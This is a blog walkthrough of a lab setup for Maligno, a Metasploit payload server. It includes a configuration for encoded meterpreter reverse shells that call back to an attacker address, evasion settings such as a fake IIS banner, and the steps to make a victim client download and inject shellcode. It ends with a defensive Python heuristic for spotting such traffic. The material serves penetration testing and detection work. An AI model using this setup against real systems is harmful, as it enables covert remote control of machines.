
May 30

Maligno (Metasploit Payload Server) – Hands On

I stumbled across Maligno on SecurityTube; there’s a good video:

http://www.securitytube.net/video/7639

Maligno is an open source penetration testing tool from Encripto (www.encripto.no) that serves Metasploit payloads.

The only negative I can see with it is that Python needs to be installed on the victim along with Pycrypto (which may be present on *nix targets but is not part of Python 2.7 for Windows).

Maligno is available for download here:

http://www.encripto.no/tools/maligno-0.6.tar.gz

What is it? [From the Maligno README]

It generates shellcode with msfvenom and transmits it over HTTP or HTTPS.

The shellcode is encrypted with AES and encoded with Base64 prior to transmission.

Maligno comes with a client tool, which is a modified version of David Kennedy’s PyInjector. Such modified client implements HTTP, HTTPS and encryption capabilities.

The client is able to connect to Maligno in order to download an encrypted Metasploit payload. Once the shellcode is received, the client will decode it, decrypt it and inject it in the target machine.

As a result, you should get your Metasploit session while avoiding detection.

Hands On

My Lab setup:

Attacker: 172.0.0.10

Victim: 10.10.0.3

First Use:

You must create an SSL certificate in order to set up Maligno with HTTPS.

certgen.sh will do the job for you.

./certgen.sh

Usage:

Make the appropriate changes to server.conf:

[Metasploit]

msfpath = /opt/metasploit/app/

msfpayload = windows/meterpreter/reverse_https, windows/meterpreter/reverse_tcp, windows/meterpreter/reverse_http

msflhost = 172.0.0.10

msflport = 4444

msfencoder = x86/shikata_ga_nai

msfiterations = 10

msfcache = true

msfcachefile = msfcache

[Encryption]

base64rounds = 1

blocksize = 32

paddingchar = !

secret = cedbd5af520bdab20c3b79d521d8b1c8

[Scope]

scope = 10.10.0.0/24

[Server]

srvport = 443

ssl = true

sslcert = ./certs/server.pem

banner = Microsoft-IIS/7.5

reqparam = id

Upload maligno_client.py and make the appropriate changes to it, e.g.:

# IP address and port where Maligno server is waiting for connections

server_addr = "172.0.0.10"

server_port = "443"

Starting Maligno Server:

# ./maligno_srv.py

=================================================================

| Maligno v0.6: A Metasploit payload server |

| by Juan J. Guelfo, Encripto AS (post@encripto.no) |

=================================================================

[*] Starting Maligno…

[*] Reading server configuration…

[*] SSL certificate file found. SSL enabled…

[*] Maligno is up and running. Press CTRL+C to stop…

Maligno Client Dependencies:

Python (Tested with 2.7 on Windows XP)

and

pycrypto (http://www.voidspace.org.uk/python/modules.shtml#pycrypto)

Tested with http://www.voidspace.org.uk/downloads/pycrypto26/pycrypto-2.6.win32-py2.7.exe

Running Maligno Server:

CTRL-C Maligno server as soon as…

[+] Package sent!

[*] End of request

…is received.

Victim (Maligno Client):

The Meterpreter session doesn’t seem to start until you CTRL-C the Maligno Server (which has done its job anyway!)

Handler:

: )
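From the defender's side, the transport the README describes (AES ciphertext, Base64-encoded, returned as the HTTP or HTTPS response) and the base64rounds setting in server.conf suggest a content heuristic for response bodies. The following is an added example, not code from this post or from the Maligno project; it assumes a TLS-inspecting proxy that exposes the response body and that the body holds only the Base64 text, and the function names and thresholds are hypothetical:

```python
import base64
import binascii
import hashlib
import math
import re
from collections import Counter

AES_BLOCK = 16  # AES ciphertext length is always a multiple of 16 bytes
B64_RE = re.compile(rb"^[A-Za-z0-9+/]+={0,2}$")

def shannon_entropy(data: bytes) -> float:
    """Bits per byte; encrypted data approaches 8.0, text sits near 4-5."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def peel_base64(body: bytes, max_rounds: int = 3):
    """Strip up to max_rounds Base64 layers (cf. base64rounds in server.conf)."""
    data, rounds = body.strip(), 0
    while rounds < max_rounds and len(data) >= AES_BLOCK and B64_RE.match(data):
        try:
            data = base64.b64decode(data, validate=True)
        except (binascii.Error, ValueError):
            break
        rounds += 1
    return rounds, data

def looks_like_encrypted_blob(body: bytes, min_len: int = 128,
                              min_entropy: float = 6.0) -> bool:
    """True if the body is only Base64 and decodes to block-aligned, high-entropy bytes."""
    rounds, raw = peel_base64(body)
    return (rounds >= 1 and len(raw) >= min_len
            and len(raw) % AES_BLOCK == 0
            and shannon_entropy(raw) >= min_entropy)

# Constructed samples (not captured traffic): SHA-256 output stands in for ciphertext.
FAKE_CIPHERTEXT = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(8))
SAMPLES = {
    "one Base64 round": base64.b64encode(FAKE_CIPHERTEXT),
    "two Base64 rounds": base64.b64encode(base64.b64encode(FAKE_CIPHERTEXT)),
    "Base64 of plain text": base64.b64encode(b"status=ok;user=alice;role=admin;" * 8),
    "HTML page": b"<html><body><h1>It works!</h1></body></html>",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(f"{name:22} flagged={looks_like_encrypted_blob(body)}")
```

Legitimate encrypted API responses will also match, so treat a hit as a triage signal and weigh it with context such as the destination's reputation and certificate.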
